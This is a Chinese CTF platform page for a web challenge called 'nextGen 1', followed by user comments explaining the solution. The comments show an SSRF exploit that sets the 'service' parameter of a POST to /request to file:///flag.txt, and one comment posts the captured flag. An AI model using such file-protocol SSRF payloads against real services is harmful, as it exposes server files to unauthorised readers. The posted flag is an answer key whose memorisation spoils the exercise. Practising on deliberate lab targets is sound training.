nextGen 1WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: L010
一血奖励: 0金币
解  决: 881
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
> Simple monitoring app.
...
登录回复
评论
Zhumeng 1月前
举报

简单的ssrf 通过网络抓包 会发送一个向request去发送一个post请求 提示说读取flag.txt 猜测是ssrf 有个这个 service=网址 这里可以把他换成 service=file://127.0.0.1/flag.txt 即可读取flag

回复 0
红薯味橘子 3月前
举报

见作者:MiracleWolf的http://47.98.239.98/2023/11/18/ctf-webnextgen-1%e3%80%812/详解

回复 0
小白帽来挖个漏洞 3月前
举报

题解:https://blog.csdn.net/guanrongl/article/details/142931716

回复 0
差距从何而起 4月前
举报

shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf}

回复 0
MOCHAOLIN 4月前
举报

POST /request HTTP/1.1 Host: 82.157.146.43:17387 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0
yun20231227 6月前
举报

改为POST请求 /request ?service=file:///flag.txt

回复 0
我孤身一人 7月前
举报

环境貌似不行了

回复 1
xiaoxiao972521 9月前
举报

service=file:////flag.txt

回复 0
.⎛⎝•̀ω•́⎠⎞. 11月前
举报

属于典型的SSRF漏洞,利用file协议读取flag

回复 0
meilanzhuju 11月前
举报

服务器到底是怎么处理这个service的?是展示这个service指向的url的内容?

回复 0

WriteUp

image
hopeinhand

1 金币

立即查看

评分(4)

解题动态

1505701406 攻破了该题 1天前
ysmilec 攻破了该题 1天前
854396873 攻破了该题 2天前
wangdashuai 攻破了该题 3天前
agvkuyfrzch 攻破了该题 6天前
w的飞行日记 攻破了该题 7天前
林lin1318 攻破了该题 7天前
PDXX 攻破了该题 8天前
ssoocc 攻破了该题 9天前
明镜止水之心 攻破了该题 10天前
dir_tree 攻破了该题 10天前
2631494162 攻破了该题 11天前
loveherKiss 攻破了该题 12天前
_liangTEA_ 攻破了该题 12天前
18280943677 攻破了该题 13天前
biandanjun 攻破了该题 13天前
17361232956 攻破了该题 14天前
ruirui123456 攻破了该题 15天前
kjkjk 攻破了该题 15天前
luogen 攻破了该题 15天前
问题反馈